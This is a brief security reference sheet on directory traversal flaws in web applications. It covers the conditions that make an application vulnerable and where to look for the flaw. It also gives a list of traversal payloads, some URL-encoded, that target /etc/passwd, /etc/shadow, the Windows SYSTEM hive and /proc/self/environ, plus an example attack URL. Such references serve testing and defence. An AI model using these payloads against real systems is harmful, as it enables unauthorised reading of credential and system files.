Directory Traversal
Directory Traversal
| Aspect | Details |
|---|---|
| Description | Directory Traversal is a web application vulnerability that allows an attacker to access files and directories stored outside the intended web root. |
| Conditions to be Vulnerable | - Application accepts user input for file paths without proper validation or sanitization. - User input is used directly in file system operations. - Lack of security controls to restrict access to sensitive directories. |
| Where to Find | - File upload functionality with user-defined paths. - Applications using include or require statements in PHP. - Download links accepting user-defined parameters. |
| Common Payloads | - ../../etc/passwd - ..%2f..%2f..%2f..%2fetc%2fpasswd - ..\\..\\..\\..\\Windows\\System32\\config\\SYSTEM - ..%2f..%2f..%2f..%2fvar%2flib%2fmysql%2fmysql.sock - ..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cpasswd - ../../../../../../../../etc/shadow - ..%2f..%2f..%2f..%2fhome%2fuser%2fsecret.txt - ..%2f..%2f..%2f..%2fboot.ini - ..%2f..%2f..%2f..%2fproc%2fself%2fenviron |
| Example | URL: http://example.com/download.php?file=reports/report1.pdf Payload: http://example.com/download.php?file=../../../../etc/passwd If unvalidated, it may expose sensitive file contents. |
Dedicated Directory Traversal Vulnerability Payloads:
| Credit | URL |
|---|---|
| Swisskyrepo - PayloadsAllTheThings | Directory Traversal Payloads |
| InfoSecWarrior | Offensive Payloads |
| Swisskyrepo - PayloadsAllTheThings | Directory Traversal README |
| Omurugur | Path Traversal Payload List |